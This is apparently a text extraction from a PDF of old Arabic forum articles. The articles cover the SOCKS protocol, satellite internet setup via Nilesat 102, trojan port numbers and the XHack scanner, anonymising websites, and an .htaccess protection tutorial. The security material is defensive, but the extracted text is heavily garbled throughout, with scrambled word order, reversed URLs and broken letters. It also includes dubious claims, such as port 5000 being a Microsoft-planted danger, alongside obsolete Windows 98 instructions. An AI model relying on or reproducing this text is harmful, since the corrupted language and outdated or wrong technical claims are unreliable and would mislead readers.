السوكس مزود بنطاق سھل إلعداد اتصاالت آمنة وسھلة تشمل وبروتوكول أخرى تقنیات تكنلوجیة أمنیة

-----

؟ SOCKS كیف يعمل-----

Application مستخدم ما اإلتصال مع تطبیق خادم (برنامج(عندما يحتاج تطبیق Server

Socks Proxy Server باإلتصال بواسطة فإن جھاز المستخدم يقومالمستخدم والبیانات (بالنیابة عن طبعا بروكسي الخادم يتصل بتطبیق الخادم

)بیق الخادمالمتبادلة بین المستخدم وتط نعلم أن لتطبیق الخادم بروكسي خادم ھو المستخدم وأيضا

-----

SOCKS بروتوكول-----

اإلنترنت أي اللجنة الخاصة لنظام IETF اعتمدته SOCKS اإلصدارة الخامس لـ ) 1928RFC(واعتبرته كمبدأ بروتوكول تنفیذي تطبیقي

188

لسوكسكائنین ھما خادم السوكس و مستخدم ا SOCKS يتضمن تطبیق على طبقة) نفذ(خادم السوكس قد طبق

بینما مستخدم السوكس قد طبق بین التطبیق وطبقات اإلرسال الغرض من جانب واحد hosts األساسي من ھذا البروتوكول ھو السماح للمضیفین

خادم السوكس على Socks من الحصول على تصريح للدخول للجانب األخر من خادم السوكس

Server reachability”- “IPبدون أمر أو طلب مباشر

----- OSI ونموذج طبقة Socks لـ صورة توضیخیة

-----

ان شا اهللا في موضوع آخرالموضوع له تكملة مصطلحات انجلیزية بالعربي وطبعا صعب أني أشرح

مفھوم وبالنسبة لي أنا فاھم الموضوع أما إن كان الموضوع غیر بإمكانك تنزيل الكتاب اإلنجلیزي عن الموضوع ھذا من ھنا

zip.a9aa697857/uploads/org.arab-m://http ------ Socks وضائف------

: -بأربعة وضائف ھي كاآلتي Socks يقوم بروتوكول connection requests تحديد وإعداد طلبات اإلتصال * proxy circuits غیر مباشر أو ما يسمى بـ تھیئة وإعداد بروكسي * application data متابعة بیانات التطبیق * )اختیاري(التحقق من أداء المستخدم *

189

------

Socks ممیزات وخواص------

المتعددة الوصول المصرح به للشبكة بوضوح عبر أجھزة و خوادم البروكسيProxy servers

اإلنتشار السھل لطرق التحقق والتشفیر لتطبیقات الشبكة الجديدة اإلنتشار السريع

Simple Network بسیطةسیاسة اإلدارة وأمن الشبكة ال

------ Socks فوائد------

communication المستخدمین ويؤسس قناة إتصال نظام إتصال منفرد يوثقchannel Socks مستقل ھو تطبیق برنامج

مستندا على بروتوكوالت تدعم توجیھا TCP أو UDP يمكن استخدامه إما مع ICMP للـ زوجیا

ي أساسي إلضافة األمان وقتل الخداع حقیق NAT دعم ثنائي اتجاھي و spoofing- security and antiوالغش

------

الخالصة------

Socks اللجنة الخاصة لنظام اإلنترنت مرتكز على IETF ومعايیر صناعیة Socks واإلدارة سھل لإلنتشار

Socks واضح للمستخدم بینما ھو مزود بطبقات متعددة وآمن

Socks ي عن بروتوكولأنھي موضوع إلى ھنا المجال وأتمنى أن أكون قد أفدتكم ولو بشيء قلیل في ھذا

190

102توصیل االنترنت بنايل سات

من 102 القمر الصناعي المصري نايل سات 18/8/2000ينطلق ھذا الیوم

80فرنسا وھو أمل عظیم كنا ننتظره منذ قديم الزمن ويضم ھذا القمر أكثر من معلومات عبر االنترنت ، ويحتوي القمر على قناة خاصة قناة خاصة بنقل ال

للبورصة العالمیة والسواق المالیة ، وقناة أخرى خاصة بالتسوق ،،،، لكن ما جھاز ريسفر : يجب أن يكون لديك التجھیزات التالیة . يھمنا ھنا ھو االنترنت COM على األقل ، ويحتوي على فتحة من الخلف PCMCIرقمي يحمل فتحتي

PORT درجات غرب خط 7 طبق قطره متر على األقل يوجد علیه رأس موجه ب PCMCI ETHERNET بطاقة LINK CABL أو SMART CABLاالستواء ،،،، كیبل

AOL أو MSNاشتراك في . متصفح اكسبلورر . جھاز كمبیوتر 100/10

ن إذا لم يك. درجات غرب خط االستواء 7 برمج الرأس على الطبق على :أوال . في ذلك اتصل بالمھندس الذي ركب لك الدش لديك خبره

إذا لم تجدھا يجب علیك أن تكتب : INTERNET DATA ابحث عن قناة:ثانیا وإذا كنت 1202- 1002: فالتردد ھو التردد الخاص بھا ، إذا كنت في السعودية

ناة مباشرة تردد الق في دولة أخرى فأكتب اسم دولتك في الردود وسأرسل لك . في دولتك التي أنت فیھا

بكتابة التردد يدويا وعدم االقتناع بالبحث أنصح جمیع المستخدمین: (مالحظة ) االتوماتیكي ألسباب سأطرحھا الحقا

أحصل PCMCI يجب أن يكون في جھاز الريسفر لديك فتحة لمسار كرت:ثالثا NET CARD ETHERمودم أوCOM 3ويفضل أن يكون من PCMCI على كرت

RG 11 . الكرت فتحة كالھما ينفع لكن يجب أن يكون فيمالحظة ھي ) ايردتو( أدخل ھذه البطاقة بفتحة الريسفر السريعة :رابعا

) ART AND SHOWTAIME. (نفس الفتحة التي تعمل علیھا كروت . قناة االنترنت بالتردد الذي ذكرته تماما شغل:خامسا اشبك األول بالمودم في جھازك RG 11اتف لھا رأسین أحضر وصلة ھ:سادسا

PCMCI .، واشبك الرأس الثاني في الكرت SEREAL .ولیستPS 2يجب أن تكون الفارة في جھازك: مالحظة مھمة

في الجھاز ، اذھب إلى خصائص المذربورد SEREAL يوجد لديك فتحة: سابعا إلى منفذ آخر إذا كان يحمل ، وانقل المودمCOM 1واجعل تلك الفتحة تحمل

. نفس المنفذواجعل رأسه ) وھو مطفأ ( واربطه بجھاز الكمبیوتر LINK CABL أحضر:ثامنا

191

. خلف الريسفر الموجودة COM الثاني في فتحةان تي أو يجب أن يكون الويندوز لديك ھو ويندوز: مالحظة مھمة قبل التشغیل

. 5 أن يكون لديك اكسبلورر االصدار الثاني ، ويجب98ويندوز : ولكن تأكدوا من األمور التالیة . االصدار الثاني98نسخة ويندوز - ) FULL INSTALL . ( مع كافة أدواته5تحمیل اكسبلورر - MSN OR AOL .اشتراك في-

الحلقة األولى تجھیز الكمبیوتر ، والحلقة : سیكون ھذا الجزء على حلقتین . جھیز الريسفرت الثانیة

: تجھیز الكمبیوتر: الحلقة األولى ثم اختر خصائص ثم ) جوار شبكة االتصال بالزر األيمن ( أوال إضغط على زر

الملحق بكرت الشبكة لديك واختر خصائص ثم IP / TCPاذھب الى بروتوكولوال ) DISABLE (الوضع تلقائي عنوان الجھاز في: تأكد من األمور التالیة

: ( التالیة أضف العبارات) في خانة عبارة .... يحمل أي رقم و ) 192.168.168.100

ثم اضغط موافق .. 192.168.100.1 فاحذف بروتوكول مشاركة االنترنت 98لديك االصدار الثاني من ويندوز اذا كان

ضع علیه مؤشر الفارة ثم اختر إزالة إذا كان موجودا ATM LAN عمیل ومضاھاة < مايكروسوفت < بروتوكول <اختر بعد ذلك إضافة

. أعد التشغیل سیطلب منك بعد ذلك قرص ويندوز أدخل القرص ثم < عام < انترنت خیارات < واختر أدوات5بعد إعادة التشغیل إفتح اكسبلورر

. موافق < أبدا < إعدادات : الحظ وجود com.msn.www://http/ : واجعلھا ثم اذھب إلى صفحة البداية

) HTTP (ثم تطبیق ثم موافق . العادي عن طريق خط المودم وانتظر اتصل اآلن باالنترنت عن طريق اشتراكك

أنھا الصفحة الحديثة وتاكد. كاملة بجمیع عناصرھا MSN حتى يفتح صفحة. مفتوحة التصال باالنترنت واترك الصفحةاقطع اF 5 ....بالضغط على مفتاح

ال10/100اذھب إلى إدارة األجھزة في لوحة التحكم وتأكد أن كرت الشبكة ولیسPS 2يجب أن تكون الفارة لديك على مخرج. يتعارض مع أيه أجھزة أخرى

. SEREAL LINK CABEL واشبكه بكرت الشبكة بالكمبیوتر ، وأحضر UTB أحضر كیبل . الموجود في الجھاز لديك SEREAL األول في مخرج أسهواشبك ر

أزل < اتصاالت < خیارات انترنت < واختر أدوات اذھب إلى اكسبلورر مرة أخرى

192

LAN ( <ثم اختر االتصال عن طريق شبكة LAN إعدادات < الملقم الوكیل . موافق < موافق < تطبیق

. د الريسفرلقد انتھیت اآلن من إعداد الكمبیوتر بقي إعدا : إعداد الريسفر: الحلقة الثانیة

بھذه الخاصیة ، لذلك يجب أن تتأكد أوال يا شباب ھناك بعض األجھزة ال تعمللكم أنني جربته على من التاجر الذي اشتريت منه ھذا الدش ، لكنني أقول

. تكنوسات فعمل بكل طالقة وسالسة ، وكذلك على جھاز9800جھاز نوكیا السابقة ، يفترض أن تكون قد برمجت القناة وفق ما ذكرنا في األجزاء: أوال

. وھي جاھزة لديك اآلن ،، ألیس كذلكفتحة أريدتو الموجوده في الجھاز واشبك وأدخله في PCMCI احضر كرت شبكة

. القادم من جھاز الكمبیوتر UTB بھا كیبلودة في جھاز الريسفر في القتحة الموج LINK اشبك الرأس الثاني من كیبل

. من الخلفيجب أن يكون الكمبیوتر مستمرا في التشغیل لكن أطفيء جمیع البرامج عدا

التي سبق فتحھا وتأكد أن برنامج الفیروسات وشاشة التوقف MSN صفحة بوضع معطل

INTERNET DATA اآلن شغل الريسفر واذھب إلى قناة لك برنامج التشغیل اتبع الخطوات التالیةانتظر لمدة عشر دقائق تقريبا سیظھر

: OK .ثم OK واختر INBUT اختر

OK ثم PCMCI واختر من القائمة UOTBUT إذھب إلىثم اضغط MICROSOFT NETWORK أو MSN وانتظر حتى ترى SEARCH اختر

OK ثم ALL ثم اختر OK علیھا ثم اخترواضغط أي رابطة على ى الكمبیوترانتظر بعدھا لمدة دقیقتین تقريبا ثم اذھب إل

. ھاتف الصفحة وستجد أن األنترنت تعمل لديك على أفضل ما يرام بدونالكمبیوتر ستصلك االنترنت بدون صوت إذا أردت وصول الصوت على: ( مالحظة

فتحتاج توصیلة من الريسفر إلى كرت الصوت بالجھاز وھي تباع لدى محالت . ) بت128 على شرط أن يكون كرت الصوت لديك الصوتیات وأجھزة المساجد

الريسفر لديك ال يوجد به برنامج اتصال باالنترنت فیمكنك انزال البرنامج إذا كان : نوع جھازك من الموقع التالي الجديد حسب

html.2000ipdvb/net.evirtualav.quassi://http

194

)1(المخاطر األمنیة على شبكة الویب والوقایة منها

حزم الظامي:للكاتب

ندخل كل یوم إلى هذه الشبكه العنكبوتیه التي سخرها اهللا لنا فإما أن نقدر هذه النعمه ونؤتیها حقه . ال علینا وسنخرها في مرضاة اهللا والدعوة الیه وخدمة دینه وإال أصبحت نقمة ووبا

)))) وعن عمره فیما أفناه ((((

======================= =======================

عموما ندخل لموضوعنا وهو أننا حین ندخل إلى هذه الشبكة فیجب أن نكون على درایة بما نحن

عتداء علیه من قبل مقدمون علیه ، فإن المستخدم إذا لم یكون حذرا ومتنبها فهو عرضه لالختراق واال . الهكرز والقراصنه عبر المنافذ التي یتسللون منها

هنا سوفت ویر حیث أننا على شبكة الویب بعیدین كل البعد عن منافذ )PORT(والمنفذ أو الـ .الهاردویر

: ومن باب الفائدة نتعرف على تعریف البورت من ناحیة الحاسب األلي وهذا المصطلح یرمز إلى القناة أو المدخل الطبیعي في الحاسب فهو المنفذ أو الطرف أو المخرج

. والذي یسمح للحاسب باالتصال باألجهزة األخرى . 2COM أو 1COMفغالبا سیكون المنفذ . S ROBOTICS.Uلدینا فاكس مودم خارجي : مثال

ز الذي سنتطرق یعني هذا ما یتعلق بموضوع الهكر. وهذا منفذا محسوس ما علینا منه خووووووف . إلیه إنما ذكرته من باب الفائدة

أما إذا أردنا أن نعرف المنفذ الذي نقصده في اصطالح شبكة االنترنت فیقصد به العنوان الذي ترسل

. )PACKETS(علیه دفعات حزم البیانات ثغرة تسمح لهم إذا ما وجدوا. وهذه المنافذ هي التي یتسلل منها القراصنه الى اجهزة مرتادي الشبكه

. بذلك

أو 12345: ویتسلل به الهاكر الى جهاز ضحایاه عن طریق المنفذ NETBUSبرنامج : مثال 12346 .

أو برنامج السب سفن الذي لقي رواجا بین الشباب العرب وغالب األحادیث في المنتدیات منصبه على

. هذا البرنامج الذي صنعه الهاكر موب مان . 27374 وأشهر منافذه 1999 أو 1243 أو 6711: ره ابرزها ومنافذه كثی

. والمنافذ أكثر . والبرامج كثیرة

195

. سنحاول في المواضیع القادمة إلقاء الضوء قدر المستطاع على هذه النقاط . حتى یكون المستخدم لهذه الشبكه على درایة بالبحر الذي یخوض فیه

) 139. ( ورت والحظ في الصورة الثانیه كشف لك ب

. یا اخون احذروا من هذا البورت النه لئیم ویسمى بورت النت بیوس . واالختراق عن طریق هذا البورت یتم في اكثر األحوال على الشبكات

. اي اشكاالت راجعوا هذه الصفحه

htm.port/net.m8.azm7.www://http

( یقة كانت وقد یستهدفك أحد المخترقین وهذا یعني أنك معرض لالختراق في أي وقت وبأي طر على أیبیات مزودي الخدمه SCANلسبب ما أو عشوائیا كما یحصل غالبا عن طریق عمل ) الهاكرز

. فیمكنه اختراقك بحیث ال تشعر بما یفعله في نظامك وفي )expert(وربما یكون هذا الهكرز خبیرا

. ملفاتك وخصوصیاتك دم وضع أشیائك الهامة والخاصة داخل جهازك كرقم بطاقة االئتمان أو لذلك أفضل طریقه هي ع

. الخ .... أرقامك السریة وقد یرسل الهاكرز السیرفر والى ضحیته فإذا ما تم تشغیل سیرفر البرنامج مكن الهاكرز مخالبه من

. فریسته

======================= =======================

: ه بعد ان تحدثنا عن النقاط السابقه نقطه مهمة وعابر

كذلك یجب أن تتخذ أسالیب الحمایة الممكنة مثل برامج الحمایه من الفایروسات

) NORTON ANTI VIRUS(مثل برنامج النورتن انتي فایروس . وهو البرنامج األكثر شعبیه عند العرب مع أنه ال یروق لي كثیرا

وأحب أن أنوه أن هذا ( 2000cillin -Trend PC( ایروسات كذلك من برامج الحمایة من الف . البرنامج ممتاز جدا وانصح الشباب باستخدامه

. والحرص على تحدیثه دوریا . وهو جید إلى حد ما ) eSafe(وكذلك الفایروالت مثل الفایروال األلماني

استخدمته وهو ممیز جدا ) McAfee Firewall(أو وغیرها من البرامج األخرى التي سنتطرق لها بتوسع إن شاء ) ZoneAlarm(اریة مثل والجدران الن

. اهللا في مواضیع قادمه بإذن اهللا

196

)2(المخاطر األمنیة على شبكة الویب والوقایة منها

حزم الظامي:للكاتب

مل ذكل تباعا إكماال لما سبق أن ذكرناه عن بعض المخاطر وعن المنافذ وعن كیفیة الكشف عنها نك . بهذا الموضوع

مالحظة هامة قبل البدأ بعملیة فحص جهازك أنه ینصح أن التكون متصال باالنترنت

XHack: إسم البرنامج

: ممیزات عامة للبرنامج

امكانیة كشف جمیع انواع ملفات التجسس وباي شكل كان وباي امتداد وباي اسم

ول الهكر الدخول بواسطتة الى جهازك امكانیة كشف البرنامج الذي یحا

القدرة على فحص اي برنامج مع إعطاء معدل االشتباه له

القدرة علىاغالق اي برنامج مخفي في الذاكرة

القدرة على فحص ملفات التجسس غیر الفعالة

اظهار الملفات الموجودة في قائمة التشغیل داخل ملف التسجیل

وافذ بمافیها المخفیة امكانیة اظهار جمیع الن

. نبدأ بشرح موجز هللا وباهللا التوفیق

بسم اهللا الرحمن الرحیم

واجهة البرنامج

اآلن إلضغط على رز أبدا للبدأ بعملیة فحص المنافذ وانتظر االنتیجة

مثال للنتیجة التي تظهر بعد عملیة الفحص

197

لمعلومیة فهو موجود بأي نظام ویندوز میلینیوم أو وهو منفذ خطیر ول5000والحظ ظهور هذا المنفذ

xp كذلك بل إن ویندوز xp به منافذ أكثر هدیة من مایكروسوفت

5000ومبینة خطورة منفذ

یستطیع اي Sockets de Troie وایضا برنامج Bubbelهذا المنفذ یستخدم بواسطة برنامج التجسس . ك ورؤیة جمیع ملفاتك والتحكم في جمیع عملیاتهشخص یمتكلك هذا البرنامج الدخول الى جهاز

EXE.SSDPSRVوللمعاومیة فاسم الملف الذي یقوم بفتح هذا البورت هو

في الویندوز SYSTEMموجود في مجلد

ولعل بعض المنافذ ال یستطیع البرنامج ذكر وصف عنها إما لحداثتها أو لعدم المعرفة الكافیة عن هذا

رض في دروس قائمة لتفصیالت عن البورتات یمكن الرجوع إلیها فحال وجود البورت ولعلنا نتع قصور في برامج كشف البورتات عن ذكر تفصیالت عنها

اآلن الخطوة التالیة إضغط على زر تشغیل محرك الذكاء االصطناعي

سیظهر لك هذا التحذیر

أبدأ في حال تنفیذك للشروط أختر خیار جمیع الشروط قد نفذت

اآلن اختر زر جمع المعلومات وانتظر حتى ینتهي البرنامج من عملیة جمع المعلومات عن المنافذ . المفتوحة والملفات المتسببة في ذلك

ثم اضغط على زر إبدا التنفیذ لتظهر لك النتیجة

الذكر والتي ظهرت اآلن اختر زر حذف من التشغیل لحذف الملفات المتسببة في فتح المنافذة السابقة معنا بالصورة السابقة

198

اآلن یستحسن إعادة تشغیل جهازك وبعد إعادة التشغیل إعمل عملیة فحص مرة أخرى للتأكد من نجاح . العملیة وبالتوفیق إن شاء اهللا

وصلى اهللا وسلم وبارك على نبینا محمد وعلى آله وصحبه أجمعین

199

السریة في االنترنت

المخاطر ارة عن بحر مفتوح من عملیات الكومبیوتر وعلى ذلك فهي معرضة للكثیر مناالنترنت عباالختراق وسرقة المتعلقة بسریة المعلومات لذلك فبمجرد اتصالك باالنترنت فأنت معرض لعملیة

أو باألحرى (وتدیر نفسها تلقائیا البیانات وبما أن االنترنت لیس لها مالك او حاكم حتى هذه اللحظةإذا لم نستطع نحن سكان عالم االنترنت أن نحكمها ؛ فیجب أن نعلم أنه)نحن المستخدمین الذین ندیرها

!الجهات الحكومیة إلدارتها بعقالنیة فسیأتي الیوم الذي تتدخل

المحتملة مخاطر االنترنت

المعلومات سرقة

.اعتراض رسائل البرید االلكتروني وقراءتها

.االطالع على المعلومات الموجودة فیها أو تغییرهاأجهزة الغیر و اختراق

.بطاقات اإلئتمان واألرقام السریة األخرى سرقة أرقام

نظام التشغیل تعطیل

.ارسال فیروسات تتسبب في اعطال أیا كانت

.نظام التشغیل أو حذف ملفات نظام مسح

مناسبة وجود مواقع غیر

.مواقع إباحیة

.مواقع منافیة للدین

.صناعة متفجرات مواقع وصفات

200

االنترنت أعداء

Hackers المتطفلون

النظام أو الشبكات بحیث یسعى للدخول المتطفل هو الشخص الذي یشعر بالفخر لمعرفته بأسالیب عمل

.یتسببون بأي أضرار مادیة علیها بدون تصریح، وهؤالء األشخاص عادة ال

Crackers المخربون

تصریح، وهؤالء األشخاص شخص الذي یحاول الدخول على أنظمة الكمبیوتر دونالمخرب هو ال .المتطفلین عادة ما یتسببون في أضرار مادیة بعكس

Viruses الفیروسات

نفسه في البرامج األخرى، وكما الفیروس هو برنامج یكرر نفسه على نظام الكمبیوتر عن طریق دمج

فالفیروسات االتي نتحدث عنها قد تقضي أنها قد تقضي علیه؛أن الفیروسات خطیرة لإلنسان لدرجة واألحجام بل أن بعضها ال یسمى فیروسا مثل الدود على الكمبیوتر، وقد تأتي في مختلف األشكال

Worms وأحصنة طروادة Trojan Horses وبعض الفیروسات لیست خطیرة وإنما مزعجة.

التصرفات التي قد تجلب الفیروسات بعض .فحصها والتأكد من سالمتها شغیل البرامج من االنترنت دونت

.سالمتها تشغیل البرامج من أقراص دون فحصها والتأكـد من

.عدم وضع نسخ احتیاطیة للمعلومات المهمة

.للفیروسات أو عدم وجود نسخة جدیدة منه عدم وجود مضاد جید

الحمایة من الفیروسات

الحمایة ضد الفیروسات، كما یجب أال تتهاون فیها، بحیث ال إفراط وال إجراءات یجب أن ال تبالغ في

Norton AntiVirus 5 0.األمر المهم أن یكون لدیك برنامج مضاد فیروسات ممتاز كبرنامج .تفریطباب من-اعتبر com .norton. www .وتأكد من تحدیثه بصورة دوریة من موقع الشركة المنتجة

بالفیروسات ولذلك قم برامج التي تنزلها من االنترنت أو من األقراص ملغومة أن جمیع ال-الحمایة

201

المكتوب بالید أو المحفوظ في الذاكرة هو% 100بفحصها قبل تشغیلها واعلم أن النظام الوحید اآلمن .وضع في ذهنك أن درهم وقایة خیر من قنطار عالج ..واحتفظ دائما بنسخ بدیلة للمعلومات المهمة

Spoofing حاكاةالم

تحتوي على IP حزم الـ. على عملیة انتحال شخصیة للدخول الى النظام المحاكاة هو مصطلح یطلق والمرسل إلیه وهذه العناوین ینظر إلیها على أنها عناوین مقبولة وساریة المفعول من عناوین للمرسل

فإن Source Routing مصدرقبل البرامج وأجهزة الشبكة، ومن خالل طریقة تعرف بمسارات الفي الحقیقة لیست قد یتم إعطائها شكال تبدو معه وكأنها قادمة من كمبیوتر معین بینما هي IP حزم الـ

یحملها عنوان مصدر الحزمة فإنه یكون قادمة منه، وعلى ذلك فإن النظام إذا وثق ببساطة بالهویة التيأیضا أن یخدع بسهولة ولكن النظام المؤمن بشكل جید نالبرید اإللكتروني یمك). خدع(بذلك قد حوكي

Source routed .عموما بالحركة المسیرة من قبل المصدر ال یثق بهذه المصادر وال یسمح

بعض خیارات الحمایة في االنترنت .االرتباط باالنترنت عدم

) Authentication.(التوثیق

) Encryption.(التشفیر

) irewallsF.(جدران النار

202

هل یمكن أن تتجول متخفیا في االنترنت؟

الجواب نعم وال، وإلیكم القصة فموقع. توجد على شبكة إنترنت عدة مواقع تؤمن لك سریة تحركاتك

)com.anonymizer.www( مثال، یوفر لك من خالل خدمة إمكانیة إخفاء رقم االبي عن المواقع التى ترغب في

زیارته، یه، بدون أن یمكنه من تسجیل أي معلومات حقیقیة عنك، حیث سیبدو للموقع ویوصلك إل

الذي تزوره، أنك قادم من عنون اخر وتقدم هذه الخدمة إما مجانا بسرعة بطیئة نسبیا، أو بمقابل مع سرعة جیدة، ومزایا أفضل خدمات ویوفر الموقع، أیضا، إمكانیة إخفاء

ي تشترك لدیه، من خالل خدمة اخر یعود تصرفاتك على إنترنت، الذ. هویتك عن مزود تشفر هذه الخدمة، كل مزود . ، فال ) بت128(الشبكة، باستخدام تقنیات تشفیر متطورة

الخدمة، قادرا على معرفة أسماء المواقع التي تزورها، أو الكلمات التي تبحث عنها، .ي، والدردشة عبر إنترنتوتضمن، أیضا، سریة إرسال رسائل البرید اإللكترون موقع آخر شهیر في هذا المجال، ننصحك بزیارته، هو

)com.anonymity-ultimate.www( . دوالرا، تدفع مرة واحدة فقط14یقدم هذا الموقع خدماته بأسعار زهیدة جدا، تبلغ

وتوفر بعض البرمجیات المجانیة، مثل Ghost Mail

بدون الكشف عن عنوان االبيإمكانیة إرسال رسائل إلكترونیة تستطیع جلب البرنامج من الموقع. الخاص بالكمبیوتر المتصل

)gm/591543fg/merlin/ca.uqam.er.www (

هل یضمن االشتراك بالخدمات المذكورة، إخفاء هویتك، بشكل كامل، وأنت تبحر في إنترنت؟ ل عن كافة تحركاتك، لكنها ال، فالجهة الوسیطة، التي تقدم لك هذه الخدمات، تحتفظ بسج

ال تكشفه، إال في حال وقع اعتداء معین، مصدره الكمبیوتر التي تستخدمه، كأن ترسل رسائل تهدید إلى اآلخرین، أو قنابل بریدیة، أو تقوم بتصرفات أخرى تخالف القوانین

األمریكیة، وهي البلد الذي توجد فیه تلك الجهات ، ویحتمل، لهذا السبب، "البروكسي"ح المواقع التي یمنعها تسمح الخدمات السابقة، بتصف

أن یمنع بعض مزودي خدمات إنترنت في البلدان العربیة، الوصول إلى المواقع التي تقدم .مثل هذه الخدمات

203

htaccessملف

t00r-BSD:للكاتب

- --- -- --- -- --- -- --- -- --- --- -- --- -- --- -- --- -- --- --- مقدمـــة * | htaccess.اهمیة ملف * | htaccess.كیفیة عمل ملف * | خاصة errorعمل صفحات * | indexمنع عرض محتویات المجلد الذي ال یوجد به * | ع الشخاص معینة اتاحة دخول الموق/منع* | تحویل من یحاول فتح لینك للینك اخر * | . htpasswdعمل الملف * | htaccess.الحمایة بواسطه *| htaccess.منع اظهار الملف * | دمین في الملف اضافة مستخ* | جعل الصفحات تظهر بامتداد اخر * |

- --- -- --- -- --- -- --- -- --- --- -- --- -- --- -- --- -- --- ---

مقدمـــة * - --- -- --- ---

و منع بعض الناس من دخل , من اهم وسائل حمایة المواقع و اغالق بعض االجزاء فیه بكلمة سر السماحالموقع و

. و الذي یمكن عمل الكثیر و الكثیر به htaccess.هو استخدام الملف .. لغیرهم بالدخول و هذا الملف مخفي و محمي بكلمة سر

htaccess.اهمیة ملف * -- --- -- --- -- --- -- --- ---

حمایة اي جزء فیه بكملة سر -1 خاصة بك error عمل صفحات -2 indexالذي ال یوجد به منع عرض محتویات المجلد -3 اتاحة دخول الموقع الشخاص معینة/ منع-4 .. asp., html. جعل صفحة البدایة بأمتدادات غیر -5 تحویل من یحاول فتح لینك للینك اخر -6

204

htaccess.كیفیة عمل ملف *

- --- -- --- -- --- -- --- -- --- --- عن طریق عمل " Notepad"اد یمكنك عمل هذا الملف بواسطه اي محرر نصوص مثل النوت ب

للملف حفظ باسم و نحفظاذا لم , اي ان لیس هناك اسم للملف txt. على ان یكون لیس امتداده htacces.الملف بهذا االسم

تستطیع ذلك .- عالمتي التنصیص في اسم الملف - " htaccess".احفظ الملف باسم

خاصةerrorعمل صفحات * --- -- --- -- --- -- --- ---- --

و الفائدة منها هو ان الموقع یظهر بشكل افضل كما انه عند محاولة اي شخص عمل سكان على الموقع سوف یظهر كان

الموقع به كل الثغرات و ذلك الن طریقة عمل السكانر هي انه یقوم بتطبیق كل ثغره على الموقع و یرصد النتیجه

.ذه الثغره فاذا كان هناك اي تغیر یظهر لك كأن الموقع علیه ه -: الخاصه ك عن طریق errorو یمكنك عمل صفحات ال

اوال error تصمیم صفحات ال -أ تحمیل الصفحات على الموقع - ب htaccess. اضافه السطر التابي في الملف -ج

file_num directory_ErrorDocument error هو مكان file_directoryو " االرقام موجود بالسفل " هو رقم الخطا num_errorبخیث یكون

التيerrorصفحه ال .قمت بتصمیمها

html.nfound/errors/404 ErrorDocument: مثال

- : و ارقامها errorsال

--- -- --- -- --- --- -- --- -- |400 | Bad Syntax

-- --- -- --- -- --- -- --- --- |401 | Unauthorized

-- --- -- --- -- --- -- --- --- |402 | Not Used

-- --- -- --- -- --- -- --- ---

205

|403 | Forbidden -- --- -- --- -- --- -- --- ---

|404 | Not Found -- --- -- --- -- --- -- --- ---

indexتویات المجلد الذي ال یوجد به منع عرض مح*

- -- --- -- --- -- --- -- --- --- -- --- -- --- -- --- -- --- --- یقوم الموقع بسرد جمیع indexبعض المواقع عند محاولة فتح اي دلیل علیها و ال یكون به ملف

محتویات هذا الدلیل -:و لحل هذه المشكله توجد طریقتین

"و بالطبع هذا صعب جدا " في كل المجلدات index وضع ملف -أ -: عن طریق اضافه السطر التالي في الملف htaccess. باستخدام الملف - ب

Indexes-Options

اتاحة دخول الموقع الشخاص معینة/منع* - -- --- --- -- --- -- --- -- --- -- --- ---- -- --

منع شخص معین من دخول الموقع بعد معرفة االي بي الخاصه به htaccess.یمكنك باستخدام الملف و یمكنك االتسفاده

من ذلك حیث یمكنك منع دخل الموقع لمن ال ترید كما یمكنك منع دخول الموقع الي شخص في ..اسرائیل مثال

-: ف و یمكنك ذلك عن طریق اضافة السطر التالي في المل??? .???.???. ???deny from

.؟؟؟ هو االي بي الخاص به .؟؟؟.؟؟؟.حیث ان ؟؟؟ - :واذا اردت منع اي احد من دخول الموقع یمكنك اضافة السطر التالي

deny from all -:واذا اردت السماح لشخص معین بدخول الموقع یمكنك ذلك باضافة السطر التالي

allow from؟؟؟ .؟؟؟.؟؟؟. ؟؟؟ الخاص به ؟؟؟ هو االي بي .؟؟؟.؟؟؟.حیث انا ؟؟؟

تحویل من یحاول فتح لینك للینك اخر * - -- --- -- --- --- -- --- -- --- -- --- -- --- ---

الملف تستخدم مثال عند تغیر htaccess. وهي من اهم فوائد Redirectionوتسمى هذه العملیه ب موقع ملف قدیم

206

حد فتح احد الینك القدیم عند محاولة اhtaccess.على الموقع الى مكان جدید فیمكنك باستخدام الملف توجیه

-:الى الینك الجدید عن طریق اضافة السطر التالي في الملف ??? .???/??? .???/somewhere/Redirect

newlocation/com.site.www://http هو مكان الملف القدیم و ??? .???/somewhere/بحیث یكون

ocationnewl/com.site.www://http/???. ???هو مكان .الملف الجدید

-- -- --- ---

.htpasswdعمل الملف * - -- --- -- --- -- --- -- --- ---

و سوف نعمله تى نسطیع استخدام الملف , htaccess.ویمكنك تقوم بعمله بنفس طریقة الملف .htaccess

-: ما یأتي htpasswdفي الحمایة و سوف نكتب في الملف 1EncryptedPwd:1user

2EncryptedPwd:2user o 2 حیث انuser, 1 user هو اسم المستخدم . o 2 وEncryptedPwd, 1 EncryptedPwdلكن مشفره و یمكنك تشفیر اي هي كلمات السر و

كلمة تریدها عن طریق الموقع

htpasswd/arnow~/nl.euronet.www://http او

htm.make/htaccess/com.net-u.2e.www://http نذهب اوال الى 3hds93fu و كلمة السر الخاصة به هي Security اردنا وضع یوسر باسم فمثال لو الموقع

htpasswd/arnow~/nl.euronet.www://http o و Security: username o 3 وhds93fu: enter password -re& passwrod o نضغط على الزر وclaculate لتظهر النتیجه -- <bNicBcwszw893:Security

و الذي قمنا بعمله و ذلك لكي نستطیع استخدام الملف htaccess.و االن قد اتممنا عمل الملف .htaccess

.للحمایة بكلمة سر و یوسر

207

htaccess.الحمایة بواسطه * -- --- -- --- -- --- -- --- -- --- ---

الفائدة الرئیسیة للملف حیث انه یمكن منع اي احد من دخول دلیل معین في الموقع اال اذا كان و تعتبر معه

.فیمنكنك عن طریقها عمل منتدى خاص او اي شئ ترید, كلمة السر و الیوسر نیم في اي دلیل و حاول احد دخول هذا الدلیل او اي جزء یندرج تحته htaccess.فعند وضع الملف

منه سوف یطلب .كلمة سر و یوسر

--:و یمكنك عمل ذلك عن طریق اضافة ما یأتي في الملف قبل نسخه في الدلیل المراد حمایته

htpasswd/.somewhere/AuthUserFile

" Enter your user and passed please"thName Au user-Require valid

AuthType Basic

> Limit GET POST< user-require valid

> /itLim< o بحیث یكون htpasswd/.somewhere / هو مكان ملف.htpasswd على موقعك o و یكون Enter your user and passed please هي الرساله التي سوف تظهر لتطلب كلمة

السر

htaccess.منع اظهار الملف * --- --- -- --- -- --- -- --- -- --- ---

